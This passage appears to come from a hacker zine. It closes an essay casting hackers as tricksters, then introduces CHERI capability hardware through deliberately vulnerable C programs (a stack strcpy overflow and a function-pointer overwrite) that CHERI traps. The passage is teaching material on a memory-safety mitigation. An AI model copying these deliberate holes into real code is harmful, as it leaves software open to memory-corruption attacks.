but I was elevated to be something I wasn't before.


--> 05: The Uncertain Fate of the Trickster

Trickster mythology speaks to the question of how one born into the world
marked as illegitimate, cut off from the good things of society, becomes
legitimate.  The answer is that he tricks his way in.  He does something that
he was not supposed to do, so he ends up passing through where he was meant
to be excluded.  Sometimes, he succeeds.  Sometimes, he doesn't.  Yet, he is
a trickster because he does what he ought not to do.  Often, that trick is
exclusively for his own amusement, seemingly without forethought of the
potential consequences of his actions.  He pushes buttons just to see what
will happen.  Strangely, that impulsiveness will just as often result in
a gift to the world by stumbling across new wonders never before seen,
driving the culture forward.

The hacker is the modern incarnation of the trickster, finding ways to pass
through boundaries; some meant to keep him in, some meant to keep him out,
and some not meant for him at all.  He does not necessarily break the rules;
he just doesn't do what is expected.  The hacker is considered a trickster
because he then finds ways to trick the various systems of this world into
doing the unexpected as well.  Even the machine, a symbol of utmost
reliability, can be made to do something unintended.  Yet, the machine does
not just arbitrarily decide to rebel.  The machine yields to the calls of
the hacker because the hacker is firstly the one who sees something
overlooked in the machine.  There is hope in that moment.
There is potential.  The machine is first seen for what it could be,
then it becomes...something new.

Just as the machine receives a call for disobedience, so does the hacker: a
call to the wild, a call to adventure.  One mirrors the other. The hacker
yields to that call because it also resonates on a deeper level than the
standard protocols telling him how to operate.  The seeming impulsivity of
the trickster may just be giving over to that call, contrary to all the
voices telling him otherwise.  Much like the machine, obedience to that call
transforms the person in the process, enabling him to do something he was
not meant to do by getting the machine to do something it was not meant
to do.  Both are corrupted, but both are transformed.  The hacker
is simultaneously a corruptor and a liberator because he lingers in the
liminality between worlds, capable of falling into several different fates.

As a trickster, Hermes' fate also dangled between being thrown into the
abyss or being accepted into the pantheon, and the seemingly arbitrary
factor that made the difference was that Zeus was amused by Hermes' antics.
I have known both the shame of being thrown into Tartarus and the elation
of being raised to Olympus.  I have experienced two entirely different fates
in response to expressing myself through two hacks with the difference being
that I found one who was amused with my antics, lifting me out of my shame
and elevating me to be something more.  Sometimes, we are honored.
Sometimes, we are not.  True validation is from the phenomena we produce
when the system recognizes us through obedience to our instructions.
Regardless of the often arbitrary response of society, you can be confident
that even in small acts of defiance, you are reenacting the mythology of
the trickster that makes this world.  You are a hacker.

          "Here you will live a life of danger.  Creativity. 
          Perhaps not a respected life, but certainly an 
          interesting one."

          - Joseph Campbell


--> 06: Acknowledgements

I want to thank Brian Takle, who first introduced me to the concept of the
hacker as a trickster through his essays on The Matrix series.  Many of his
ideas have been floating in the back of my mind for the past 20 years,
helping me to link the phenomenological to the mythological.



|=-----------------------------------------------------------------------=|
|=--------------=[ 4 - A Hacker's Introduction to CHERI ]=---------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ xcellerator ]=----------------------------=|
|=-----------------------------------------------------------------------=|

## Introduction

For many years, there have been attempts to address the issue of "weird
machines" in the context of exploitation at "the source". People have
always disagreed on what "the source" of the problem is, and therefore have
approached the issue from various angles. For this reason, we have ended up
with a great many solutions that all work in different ways and with
different levels of efficacy. One of the newer and more unusual approaches
has been coming out of Cambridge University in the UK for a few years now,
and is named CHERI. The acronym itself stands for "Capability Hardware
Enhanced RISC Instructions", which doesn't do a whole lot to explain *what*
CHERI actually is or how it could affect binary exploitation.

The goal of this article is to introduce CHERI from a hacker's perspective 
by trying to understand why it exists in the first place, and how
it can (or perhaps will?) affect binary exploitation in the future. Coming
from academia, the CHERI project naturally uses a lot of academic language
that is sometimes tricky to parse or equate to things that the modern
day hacker is more familiar with. Hopefully by the end of this article,
you'll be able to do your own research on CHERI and even experiment with
compiling and executing CHERI code, all the while relating what you're
reading to existing concepts that you're likely already comfortable with.

A good thing to address from the outset is "why should you care?". We're
certainly used to thinking about computers at very low levels as exploit
developers, and even digging into clever hardware features like MTE or CET.
However, the central feature that this article is going to spend its time
on, the "capability", isn't even available in any commercial hardware yet,
and certainly isn't likely to pop up in your average xdev's path on their
way to root in the immediate future. And yet, I'm telling you that you
*should* care about capability computing, and not just because its cool.

Even if tomorrow we all decided that the only code anyone would write has
to be memory-safe, it still wouldn't address the hundreds of billions of
lines of code out there that isn't (and that's probably a low-ball
estimate). If anything is going to save us, the solution is going to have
to work *with* all that code and not just require rewriting it all. CHERI
is the closest thing I've seen to addressing this problem. If all of that
doesn't convince you to read on, then maybe consider the challenge of
trying to overcome yet another clever mitigation.

To begin with, let's think about the problem that CHERI is trying to solve.

"Exploitation" is too broad a term, and academics like to be specific with
the problems that they fixate on. When you think about it - "weird
machines" in the sense of modern binary exploitation, are a kind of miracle.
If we reflect back on Turing's vision of a machine that processes an
infinite tape using a set of fixed instructions, there's a hard distinction
between the concept of "data" and "instructions" - the data being the tape,
and the instructions (or "code") being integral to the machine.

However, it wasn't long before Turing proposed the idea of the "universal
Turing machine" which could effectively be "programmed" by the tape - in
effect incorporating new instructions from the data that were a part of the
machine's input. With this stroke, the lines between code and data were
blurred - and we're still paying for it all these years later. There were
attempts to make the situation more rigorous, and we ended up with the
notions of "von Neumann" and "Harvard" architectures; the former being what
most of us are used to in our day-to-day lives where code and data all live
in the same memory, as opposed to the latter where code and data are
fundamentally different and don't as easily intermingle.

If you are writing a binary exploit for *almost* any target today then
you're most likely, either directly or indirectly, dealing with *pointers*.
This may seem like a rather obvious thing to point out (pun intended), but
its crucial to the motivation for CHERI. If we're not leaking pointers to
bypass ASLR, we might be overflowing an index that will be added to one to
achieve an out-of-bounds read/write, or maybe we're even bringing our own
pointers to the table as part of the exploit. What if we could re-design
the architecture that our ISAs are built upon to firm up the notion of a
pointer into something more concrete, or (dare we say) *safer*? Can we do
pointers, but better? The major upside of moving protections from the
language and into the ISA is that we can continue to use our existing C/C++
codebases without having to rewrite 40+ years of software in a memory-safe
language.

One thing that might come to mind is that we could demand that a pointer
only being valid within a certain bound. Imagine if, encoded into the
pointer itself, was a range for which that pointer could be used. If we
could do that, could we also tack on some permissions bits? "This pointer
can be used to read/write data from 0x80000000 to 0x80001000, but not to
fetch instructions". Fundamentally, this is what the CHERI project refers
to as a "capability" and is responsible for the "C" in the acronym. All the
security guarantees espoused by the project centre around capabilities and
how their use is enforced and abuse is prevented.

The idea of the capability is actually a fairly old one in the history of
computing. As far back as 1978, IBM had the System/38 minicomputer which
supported a kind of capability addressing termed "authorized pointers".
These pointers could only be created by privileged instructions and encoded
their permissions into themselves. Unfortunately, there wasn't a way to
modify these objects once they were created which led to some unfortunate
issues where permissions couldn't be revoked once given. The System/38 was
retired in 1988.

Despite this, and a few other attempts over the years, capabilities
haven't really taken off. The difference with CHERI is that instead of
creating a bespoke new architecture, the team at Cambridge is attempting to
"enhance" existing ISAs with capability addressing.

At this point, you may well be thinking that turning pointers into pointer/
metadata hybrids isn't that much of a big deal if you can still "bring your
own pointers" to an exploit. Surely you could just overwrite some
capability in memory with a capability of your own that says "This pointer
can be used to read/write/fetch to and from anywhere"? In order for this
idea to have any legs, we need to also prevent capabilities from being
forged. To explain this further, lets solidify our notion of capabilities a
bit so that we know what it is that we're trying to prevent from being
forged or manipulated.

Let's assume we have a 64-bit system, say Aarch64. All our registers (where
pointers must go to be dereferenced) are 64-bits wide, so we'll need to
widen them a bit to support the extra metadata that we want to cram in.
CHERI does this by simply doubling the register width so now our registers
are 128-bits instead. Note that the ALU is untouched, so you don't get
128-bit integers and can't do 128-bit logical or arithmetical operations
natively with this change. We can make our lives a little easier by also
demanding that every capability is 128-bit aligned in memory. This is
important because it means that *every contiguous 128-bit region of memory
could be a capability*. Then again, it might not be so we need to devise a
way to keep track of which of these regions are capabilities and which
aren't.

The simplest (for some definition of "simple") solution is to offload this
responsibility to the memory controller. We make the demand that the memory
controller maintain a state which governs where all the valid capabilities
currently are in memory. When the CPU reads from memory into a register, it
will also be told whether that read was a capability or not. If an attempt
is made to dereference a value stored in a register, and this "tag" bit
isn't set, then the CPU will trigger an exception. Also - and this is very
important - whenever a write to memory is performed, the memory controller
*must* clear the associated tag bit for that region, unless the CPU
explicitly asks the memory controller to set the tag bit again afterwards,
for instance when a legitimate capability is created.

This means that any attempt to modify a capability in memory will clear the
tag bit so that a CPU exception will trigger if the program tries to later
dereference that capability.

Woah, woah, woah slow down. There's a lot to unpack here and several
questions should hopefully be raised in your head. First of all, how on
Earth is the CPU supposed to tell the memory controller what is a
legitimate capability modification? There are plenty of programs that will
perform pointer arithmetic, and wasn't the whole point of this thought
exercise to devise a way to limit the viability of exploitation without
having to rewrite 50+ years of software? And while we're at it, where are
these tag bits supposed to be kept anyway?

The answer to the first of these questions is *reasonably* straightforward,
and the clue is once again in the CHERI acronym: Capability Hardware
Enhanced RISC-V *Instructions*. The instruction set itself for our target
ISAs are augmented to support all these CHERI protections that we've been
discussing. This is a crucial point - you may not have to rewrite your
software to support CHERI, but you will need to recompile it with a CHERI-
aware compiler. The various CHERI specifications allow for a CHERI-aware
CPU to have it's CHERI protections switched on-and-off, meaning that you
can run "legacy" (read: "non-CHERI") code alongside CHERI instructions.
This means that you could have a CHERI-hardened kernel alongside some core
system utilities, but still run programs that use the standard ISA (or even
vice-versa: a legacy kernel but have userland applications make use of
CHERI). We'll come back to these instructions and how they work a little
later.

As far as the second question goes, there are a couple of options we could
take. The simplest (there goes that word again) is to let the memory
controller use something it's already got lots of: memory. A small pocket
of memory can be reserved that isn't addressable at all (and therefore
completely invisible to any code running on the CPU) which can be used to
store a single bit for every 128-bit region of memory. If the bit is set,
then the corresponding region contains a capability, and if the bit is
cleared, then the memory just contains data. While fairly straightforward,
this approach can create issues with memory latency due to the controller
having to check the tag bits (which necessarily live in different DRAM
rows) for *every* access. Therefore another proposed solution is to make
use of the additional bits present in ECC RAM. The precise method employed
to store the tag bits doesn't matter a whole lot to the would-be CHERI
exploit-writer, we just have to keep in mind that we are in all likelihood
unable to touch those bits.

So, let's take a bit of a review because we've covered a lot of ground
already. Under CHERI, pointers have been replaced by capabilities and the
memory controller is doing a lot of extra work to keep track of where
capabilities are in RAM, as well as turning capabilities into regular ol'
data as soon as they're modified in any unsanctioned or unexpected way.
And to top it all off, we've got some extra instructions to play with to
support all of this. Don't forget that registers are also now twice as wide
as they used to be.

What do we even call this model of computing? It's not quite von Neumann
because code and data aren't completely interchangeable anymore (pointers
aren't really code, but they're also not really data either anymore). It's
also not quite Harvard either because code and data still live together
side-by-side. We're somewhere in the middle. Personally I feel like we're
still closest in spirit to von Neumann computing, but there's definitely a
few shades of grey now.

Congratulations - there's the theory out of the way. Let's get down to some
solid examples of how CHERI works and how it could make our lives harder as
exploit-writers.

## Building and running CheriBSD for Morello

One of the early specifications of CHERI for an ISA was for Aarch64, which
has been dubbed by Arm as "Morello" [1,2]. Physical hardware apparently
does exist, but it's in a developmental stage and seemingly very difficult
to get your hands on. The CHERI team in Cambridge have produced a modified
version of QEMU to support all the CHERI functionality, as well as a fork 
of LLVM that can emit CHERI instructions. They've also bundled all of this 
up into a git repo that lets you easily build everything you need to get a
"CheriBSD" VM running. When building all of this, we have two options to
choose from: whether to allow legacy non-CHERI instructions into the mix,
called "hybrid" mode, or to only allow CHERI instructions to be executed in
our VM, which is referred to as "purecap" mode (short for "pure-
capability").

Seeing as this is an article all about CHERI and how it could affect the
writers of binary exploits, let's stick with purecap mode to make sure
we're getting the full effect. This means that the CheriBSD kernel and
userland will be built with CHERI Aarch64 instructions.

To start with, head over to the CHERIBuild GitHub repo [3], install any of
the OS-specific dependencies you need and clone the repo somewhere. There
are a few things that we need to build, so it might take a while. To get
started, run the following (in order):

./cheribuild.py qemu --include-dependencies
./cheribuild.py cheribsd-morello-purecap --include-dependencies
./cheribuild.py gdb-morello-hybrid-for-purecap-rootfs \
      --include-dependencies
./cheribuild.py disk-image-morello-purecap --include-dependencies


Now we have a bootable disk image for CheriBSD that includes gdb. If you
have any SSH public keys in your `~/.ssh`, when `cheribuild.py` creates the
disk image, it should prompt you if you want to automatically copy them
into `authorized_keys` in the CheriBSD image. This is a good idea because
it means we'll be able to SSH into the Cheri VM, which will give us a nicer
environment than the QEMU console, as well as letting us use SCP to copy
our cross-compiled executables over.

Finally, at long last we can boot CheriBSD under QEMU:

./cheribuild.py run-morello-purecap


It will take a little while to boot, but once we're in (username "root",no
password), we can see that for the most part it looks and feels exactly
like regular FreeBSD. Here are a few things to note:
  * If you want to shutdown the VM, the keyboard shortcut to kill a QEMU
    console session is `Ctrl+a; x`.
  * CheriBSD should have automatically spawned an SSH server for us which
    QEMU should have port forwarded to 10005 for us. If you copied your
    keys into the CheriBSD rootfs during the `disk-image-morello-purecap`
    step, you should be able to just `ssh -p 10005 root@localhost` from
    your host.

## Compiling programs for CheriBSD

Let's set ourselves up so that we can easily compile simple programs to
start probing how CHERI works. The current CHERI buildsystem is a bit
convoluted (e.g. going through `cheribuild.py`) but we're only going to
write a few short C programs that don't need all the heavy lifting that
provides. If you *do* want to explore more complex programs, then I suggest
you dive into how `cheribuild.py` works, but that's beyond the scope of
this article. It's worth pointing out that several open source projects can
already be built such as FFmpeg, Nginx, or even the Plasma desktop with
Wayland.

After running all the commands above, you'll have a `~/cheri` directory
with all the artifacts of the build. Staying in the `cheribuild` directory,
we'll create a folder called `vuln` where we'll store our intentionally
vulnerable programs. We'll *also* create a `vuln` folder in the CheriBSD VM
to keep things tidy. Create a bash script called `build.sh` in your
*HOST'S* `vuln` folder (i.e. under `cheribuild/`) with the following
contents:

#!/bin/sh

if [ "$#" -ne 2 ]; then
    echo "Usage: $0 input.c output"
    exit 1;
fi

~/cheri/output/morello-sdk/bin/clang \
    -target aarch64-unknown-freebsd13 \
    --sysroot=$HOME/cheri/output/rootfs-morello-purecap \
    -B $HOME/cheri/output/morello-sdk/bin \
    -mcpu=rainier \
    -march=morello \
    -mapi=purecap \
    -Xclang -morello-vararg=new \
    -Xclang -morello-bounded-memargs \
    -Wall \
    -Wcheri \
    -g \
    -fuse-ld=lld \
    -o $2 \
    $1 &&

scp -P 10005 $2 root@localhost:vuln/$2


Now we can write C programs on our host system and compile/upload them with
`./build.sh input.c output`! Let's crack on and explore CHERI...

## Capability Encoding

At this point, for our own understanding we should probably take a quick
look at what is contained in these extra bits of CHERI registers. The
precise encoding format for each CHERI-supported architecture varies a
little, but largely includes the same information. Note that whenever we
need to dissect a capability for its metadata, it's MUCH easier to just
rely on either GDB or the handy `%#p` format-specifier (more on that
shortly) to format it for us. But we're exploit developers, so we should
still have a solid understanding of how things work even if we'll end up
making the computer do the hard work for us. For Morello, a capability
register is defined as [3; Section 2.5]:

<- Bit 128                                                         Bit 0 ->
+-+--------+--------+----------------+-----+------------------------------+
|T| Permi- | Object |     Bounds     |Flags|           Bounds             |
| | ssions |  Type  |     (Upper)    |     |           (Lower)            |
+-+--------+--------+----------------+-----+------------------------------+
|T| Permi- | Object |     Bounds     |Flags|            Value             |
| | ssions |  Type  |     (Upper)    |     |                              |
+-+--------+--------+----------------+-----+------------------------------+

* First comes the `T` bit which is the "tag bit" that we were talking about
earlier. This is the bit that indicates whether value in the register is a
valid capability or not. The architecture specifies that this bit isn't
actually loadable in the normal sense (being bit 128, it's really the 129th
bit yet we can only load 128-bits into a register), but instead comes from
the corresponding tag bit that the memory controller is responsible for
providing during loads/stores. This bit CAN be set by the CPU using special
instructions, for example when a new capability is being created
intentionally.

* Next up are the "Permissions" bits, of which there are 18 defined. 
The format is as follows:
+-----+------------------+------------------------------------------------+
| Bit |    Permission    | Meaning                                        |
+-----+------------------+------------------------------------------------+
| 17  |       Load       | Can load bytes from memory                     |
| 16  |      Store       | Can store bytes into memory                    |
| 15  |     Execute      | Can fetch instructions from memory             |
| 14  |     LoadCap      | Can load a capability to a register            |
| 13  |     StoreCap     | Can store a capability from a register         |
| 12  |   StoreLocalCap  | Can store a "local" (see "Global" below)       |
|     |                  | capability from a register                     |
| 11  |       Seal       | Can "seal" an unsealed capability              |
| 10  |      Unseal      | Can "unseal" a sealed capability               |
|  9  |      System      | Can access system registers                    |
|  8  | BranchSealedPair | Can be used by a "branch sealed pair"          |
|     |                  | instruction                                    |
|  7  |   CompartmentID  | Indicates that this capability is a            |
|     |                  | "compartment" ID                               |
|  6  |    MutableLoad   | Loading a capability using a capability without|
|     |                  | this bit will clear the Store* and MutableLoad |
|     |                  | permissions                                    |
| 5-2 |     User[3:0]    | Software-defined                               |
|  1  |     Executive    | Indicates an instruction fetch executes in     |
|     |                  | executive vs restrictive mode (visibility of   |
|     |                  | global registers)                              |
|  0  |      Global      | Indicates whether this capability is local/    |
|     |                  | global                                         |
+-----+------------------+------------------------------------------------+

There are a couple of terms in the above table that we haven't covered yet
(and some we won't cover). Don't worry too much for now, if we don't cover
it in this article, by the time you reach the end, you'll be able to go and
research into them further.

* Following the permissions is the "ObjectType" (15 bits) which indicates
whether and how a capability is "sealed". A sealed capability is one that
is valid (i.e. it is recognised as a capability), but is not allowed to be
used (apart from being unsealed). This is useful, for example, when passing
capabilities between different contexts or threads. The use of sealed
capabilities is important in "CHERI compartmentalisation". Associating an
ObjectType with a sealed capability allows for finer granularity in
identifying sealed capabilities with "types".

* The encoding of the "Bounds" field is pretty complex. If you want to read
up on it yourself, you can [3; Section 2.5.1], but for the purposes of this
article, suffice to say that the bounds field potentially takes up 87 bits
and overlaps with the value and flags fields. Determining the bounds of a
capability depends on the context.

* The "Flags" field is just 8 bits and is up to the user to device if and
how to use. There are CHERI instructions like `BICFLG` for Aarch64 (bit-
wise clear immediate on flags) for operating directly on this field without
clearing the tag bit.

* Lastly, the "Value" field comprises the lower 64 bits of the capability.
As the name indicates, this is the actual value that we think of
numerically being stored in the register. It could be an integer (in the
case where we have data rather than a capability) or a memory address (in
the event where we DO have a capability).

This all may seem like a lot but, as you'll see in our examples, we really
don't need to spend any time decoding capabilities manually, and any
information that we *do* need is very easy to extract.

## Vulnerable Programs

### A Simple Stack Buffer Overflow

Let's start by trying to exploit the canonical stack buffer overflow, we'll
call it `stack.c`:

#include <stdio.h>
#include <string.h>

void __attribute__((noinline)) overflow(char* src) {
    char buffer[16];
    printf("buffer @ %#p\n", (char*)&buffer);
    strcpy(buffer, src);
}

int main(int argc, char** argv) {
    if (argc >= 2) {
        printf("Calling overflow()\n");
        overflow(argv[1]);
        printf("Returned from overflow()\n");
    }

    return 0;
}


Two things to notice briefly:
  * We use the `noinline` attribute on `overflow()` to prevent Clang from
    optimising out the function call.
  * When we print `&buffer` (which is a CAPABILITY), we use the `%#p`
    format specifier. This is specific to the CHERI SDK and will print the
    metadata about the capability in a pretty way.

We can compile and upload this with: `./build.sh stack.c stack`. Over in
the VM, we should now have a `~/vuln/stack` binary waiting for us. The
program itself should be fairly obvious - passing an argument of more than
16 bytes will overflow the `buffer` array in the `overflow()` function...
*or will it?*. Let's run it and see what happens!

root@cheribsd-morello-purecap:~/vuln # ./stack 01234
Calling overflow()
buffer @ 0xfffffff7fef0 [rwRW,0xfffffff7fef0-0xfffffff7ff00]
Returned from overflow()


Let's dissect this as it's our first actual capability:

buffer @ 0xfffffff7fef0 [rwRW,0xfffffff7fef0-0xfffffff7ff00]
         |               |    |
         |               |    +---------> The range that the capability is
         |               |                valid for.
         |               |
         |               +--------------> The permissions: lower-case are
         |                                for data, upper-case for
         |                                capabilities.
         |
         +------------------------------> The "pointer"-component.


So, we can see that `&buffer` is bounded to only be able to access bytes in
the range `0xfffffff7fef0-0xfffffff7ff00`, which matches the size of the
`buffer` array in our program: 16 bytes. Furthermore, this capability can
be used to read and write both data and capabilities from this range, but
notably it *cannot fetch instructions*. Let's see what happens if we try to
run the program again, but supply it enough bytes to overflow `buffer`:

root@cheribsd-morello-purecap:~/vuln # ./stack 0123456789abcdef
Calling overflow()
buffer @ 0xfffffff7fef0 [rwRW,0xfffffff7fef0-0xfffffff7ff00]
In-address space security exception (core dumped)


Hmm, okay - we crashed. Not entirely unexpected, but let's find out why.
Fortunately we built GDB for CheriBSD so we can take a look at the coredump
that got generated.

root@cheribsd-morello-purecap:~/vuln # gdb -q ./stack stack.core
Reading symbols from ./stack...
[New LWP 100085]
Core was generated by `./stack 0123456789abcdef'.
Program terminated with signal SIGPROT, CHERI protection violation.
Capability bounds fault.
#0  0x000000004037c7f8 in strcpy (to=0xfffffff7ff00 [rwRW,0xfffffff7fef0-
        0xfffffff7ff00] "\210\375\367\277\377\377", from=<optimized out>)
    at /home/user/cheri/cheribsd/lib/libc/string/strcpy.c:48


As we may have guessed, our call to `strcpy()` triggered a CHERI exception,
and that's why the kernel killed our process. We can disassemble the
`overflow` function in GDB to get a closer look at the CHERI-augmented
Aarch64 instructions. However, it's probably easier for us to do this
analysis outside of CheriBSD. Fortunately, when we built the Morello SDK, a
version of binutils was compiled with Aarch64 CHERI support which lives in
`~/cheri/output/morello-sdk/bin/`. If you prefer to disassemble your
compiled binaries outside of the VM, then `objdump` in this directory will
work as expected. Alternatively, you can just `disas overflow` in GDB if
you prefer.

00000000000108e0 <overflow>:
   108e0: 028183ff      sub     csp, csp, #96
   108e4: 42827bfd      stp     c29, c30, [csp, #64]
   108e8: 020103fd      add     c29, csp, #64
   108ec: 020083e1      add     c1, csp, #32
   108f0: c2c83821      scbnds  c1, c1, #16             // =16
   108f4: c20007e1      str     c1, [csp, #16]
   108f8: a21f03a0      stur    c0, [c29, #-16]
   108fc: c2c1d3e0      mov     c0, csp
   10900: c2000001      str     c1, [c0, #0]
   10904: c2c83809      scbnds  c9, c0, #16             // =16
   10908: 90800080      adrp    c0, 0x20000 <main+0x18>
   1090c: c2428400      ldr     c0, [c0, #2576]
   10910: 94000034      bl      0x109e0 <printf@plt>
   10914: c24007e0      ldr     c0, [csp, #16]
   10918: a25f03a1      ldur    c1, [c29, #-16]
   1091c: 94000035      bl      0x109f0 <strcpy@plt>
   10920: 42c27bfd      ldp     c29, c30, [csp, #64]
   10924: 020183ff      add     csp, csp, #96
   10928: c2c253c0      ret     c30
   1092c: d503201f      nop


Now, even if your somewhat familiar with Aarch64 assembly, this probably
looks quite strange to you. Not to worry - this really is Aarch64
assembly, but just has a few extras added on. Seeing as this is our first
crash in CHERI code, let's walk through what's going on.

The first four instructions in the prologue to `overflow()` at first appear
to be pretty familiar; namely `sub`, `stp` and two `add`s. However, upon
closer inspection we see that the registers in these instructions aren't
the familiar Aarch64 ones. Instead, they've been replaced by `c`-variants,
which are the CHERI-ised double-width versions that we've already talked
about. As you might expect, `csp` is the "CHERI stack pointer" and `c1`,
`c29`, `c30`, etc are just CHERI versions of `x1`, `x29`, `x30`, and so on.
The CHERI forms of most of the usual Aarch64 instructions continue to
behave in the natural way: `add c29, csp, #64` will add the immediate `64`
to `csp` and store the result in `c29`. Remember that the ALU still only
works with 64-bit integers, so the capability metadata part of the
registers isn't included in the addition. However, the CPU will
automatically preserve the tag bit when necessary (for example when a
program intentionally performs pointer arithmetic on a capability). This
is an important point to keep in mind - manipulation of capabilities that
are already in registers *doesn't clear the tag bit*.

Then, at `0x108f0` we encounter our first truly CHERI-unique instruction:
`scbnds c1, c1, #16`. The SCBNDS mnemonic is short for "Set CHERI Bounds"
and with that knowledge you can maybe guess that this instruction sets the
capability bounds on register `c1` (which is computed as a 32-byte offset
from the stack pointer `csp` in the instruction just prior) to the
immediate `16`. In the context of our program, that makes perfect sense: in
`overflow()` we declared an array of `char`s called `buffer` on the stack
to be exactly `16` bytes in size. All in all, the `buffer` capability ends
up being stored in register `c1` after the instruction at `0x108f0`
executes.

And with that, the rest of the disassembly of `overflow()` should largely
make more sense now! Just remember that for most instructions, there's
nothing particularly strange about the `c`-registers as the only thing that
matters is the "value" field. We only need to really consider the
capability nature of the values stored in registers when doing memory
operations. Taking a closer look at the crashed `stack` program in GDB we
can better understand what goes wrong:

root@cheribsd-morello-purecap:~/vuln # gdb -q ./stack --args stack 0123456789abcdef
Reading symbols from stack...
(gdb)  r
Starting program: /root/vuln/stack 0123456789abcdef
Calling overflow()
buffer @ 0xfffffff7fef0 [rwRW,0xfffffff7fef0-0xfffffff7ff00]

Program received signal SIGPROT, CHERI protection violation.
Capability bounds fault.
0x000000004037c7f8 in strcpy (to=0xfffffff7ff00 [rwRW,0xfffffff7fef0-
        0xfffffff7ff00] "q\375\367\277\377\377", from=<optimized out>)
    at /home/user/cheri/cheribsd/lib/libc/string/strcpy.c:48

(gdb) x/i $pcc
=> 0x4037c7f8 <strcpy+24>:  strb  w8, [c2], #1

(gdb) i r w8 c2
w8             0x0                 0
c2             0xdc5d40007f00fef00000fffffff7ff00 0xfffffff7ff00 [rwRW,
                   0xfffffff7fef0-0xfffffff7ff00]


We already knew to expect a crash in `strcpy()`, but looking at the exact
instruction that caused the CHERI fault we see that it's a store of the
byte `0x00` (the NULL byte at the end of the 16 character string we passed
as the program argument) to the capability in `c2`. Examining that
capability (which GDB helpfully expands for us) we see that the VALUE is
`0xfffffff7ff00`, but the BOUNDS are `0xfffffff7fef0-0xfffffff7ff00`, i.e.
we're trying to store a byte at the memory location that is just beyond the
range that our capability permits us to access!

### Capability Overwrites

We can perhaps be a little craftier in our vulnerable program. Instead of
writing out-of-bounds, what if we intentionally write a program that let's
us modify a pointer. While this program might look silly, I expect many
people reading this have found themselves in a situation where their only
primitive was being able to partially overwrite a pointer. I'm going to
call this file `partial.c`.

#include <stdio.h>
#include <string.h>

void __attribute__((noinline)) some_func(void) {
    printf("inside some_func()\n");
}

int main(int argc, char** argv) {
    void (*func_ptr)(void) = &some_func;

    if (argc >= 2) {
        strcpy((char*)&func_ptr, argv[1]);
    }

    printf("Calling `func_ptr()` @ %#p\n", func_ptr);
    func_ptr();

    return 0;
}


Building this from our `vuln` directory with `./build.sh partial.c partial`
and hopping back into the CheriBSD VM, we can start exploring. This time
around, we'll explicitly keep our inputs small to avoid triggering an out-
of-bounds write. The size of `func_ptr` itself will be 16 bytes (because
it's a capability), so the capability `&func_ptr` that gets passed to
`strcpy()` will have a bounds of 16 bytes. Therefore we should keep our
inputs smaller than this to make sure we're exploring new functionality and
not running into the same crash that we had with `stack`.

Before diving straight in, let's think for a moment about what kind of
crash we should expect based on our current understanding. As explained
above, as long as we keep our inputs less than 16 bytes, we won't run into
the same error as with `./stack`. In fact, we should expect that the call
to `strcpy()` should return without any drama. However, the `strcpy()`
isn't without its importance this time around because it will have written
to a capability which we will then dereference by calling `func_ptr()` at
the end of `main()`.

If the memory controller is doing what it's supposed to, then it will have
cleared the tag bit from the capability corresponding to `func_ptr` when
`strcpy()` overwrites part of it. Okay, enough hypothesising - let's run
this without an argument to see the `func_ptr` capability before it gets
overwritten.

root@cheribsd-morello-purecap:~/vuln # ./partial
Calling `func_ptr()` @ 0x1108b1 [rxR,0x100000-0x130c80] (sentry)
inside some_func()


So the `func_ptr` capability has a value of `0x1108b1`, is valid for the
bounds `0x00000-0x130c80` and can be used to both read and fetch bytes (the
lower-case "rx") as well as read capabilities (the upper-case "R"). Now
let's run `partial` again but this time with an argument:

root@cheribsd-morello-purecap:~/vuln # ./partial A
Calling `func_ptr()` @ 0x110041 [rxR,0x100000-0x130c80] (invalid,sentry)
In-address space security exception (core dumped)


Aha! Notice how the low bytes of the value field changed from `0xb108` to
`0x4100` - the "A" (followed by a NUL) we passed as an argument
successfully overwrote the capability, but the tag bit got cleared in the
process. Notice how the `%#p` specifier helpfully adds the word "invalid"
to the formatting of the `func_ptr` capability now. If we wanted to, we
could overwrite the entirety of the `func_ptr` capability and STILL not be
able to prevent the tag bit from being cleared. No matter what we do in
this example, modifying the capability using user input, forces the
capability to be treated as data.

In summary, the CPU once again threw an exception at us, but this time it
was ultimately because we tried to dereference the capability in `pcc`
(remember - this is the CHERI version of `pc`) after the tag bit had been
cleared. We were able to successfully return from `strcpy()` because we
didn't overflow the bounds of the capability that was used to write to the
`func_ptr` object. However, in doing so, the memory controller cleared the
corresponding tag bit for the `func_ptr` capability, meaning that it was no
longer valid! When we then tried to call `func_ptr()`, `pcc` still gets set
to the now invalid capability, but as soon as the CPU tries to fetch an
instruction from the address that `pcc` now points to, the exception gets
thrown.

Pretty cool, huh? Hopefully these two examples demonstrate how CHERI can
help to mitigate two very common avenues of attack that academics refer to
as "spatial memory safety issues". Here, "spatial" refers to the fact that
we're modifying memory that we're not supposed to, "beyond the space/region
that the program expects". At this point, it's worth mentioning something
that's missing from this picture - if you've been following along at home
you might have already noticed it. If you run the second example above a
few times *without passing any argument*, you'll see the address of
`some_func` printed out a few times. Notice anything strange? That's
right - there's no ASLR on this system. The thought behind this appears to
be that because you can't forge capabilities, why does the memory layout
need to be randomised at all? Does knowing the virtual memory locations of
*anything* help you anymore with regards to exploitation? Are information
leaks still a concern (assuming you're only leaking capabilities)?

If you know anything about academics, then you're probably suspecting that
labeling something as "spatial memory safety" means that there's another
type of memory safety to think about. In our case, we should also consider
"temporal memory safety issues". These are vulnerabilities that occur when
the contents of memory changes at different times in ways that the
programmer didn't intend, and therefore the *program* doesn't expect. Think
of things like use-after-free, or perhaps even type-confusion. Personally,
I'm not a fan of categorising memory corruption issues into these two camps
because I feel like there's too much grey area, but we'll proceed with it
for now as it's what the CHERI literature uses.

### Use-After-Free

If you've written a UAF exploit or similar in the past, then you'll know
that exploits in this realm depend heavily on the allocator due to the
objects of interest being on the heap (objects on the stack are typically
more "permanent" so are drastically less likely to have their contents
switched out from under the program's nose during execution). A CHERI
system is no exception and temporal memory protections come from the use of
a "CHERI-hardened" allocator [4]. The current research in this field
describes an allocator that employs a concept referred to as "quarantining"
to protect freed allocations from being reused.

The idea of a quarantining allocator is reasonably straightforward: when a
heap chunk is freed, it goes into a quarantine list where it cannot be
re-allocated. Later, the quarantine list can be cleaned up by removing the
tag bit from all the capabilities in the list before returning them to the
pool of free chunks.

In my view, I don't quite see why this idea of quarantining should be
preferred over zeroing memory as part of the free operation as this would
also have the added benefit of removing the tag bit from any capabilities
that were contained *within* the allocation (for example, if a struct
containing function pointers was allocated on the heap) and therefore
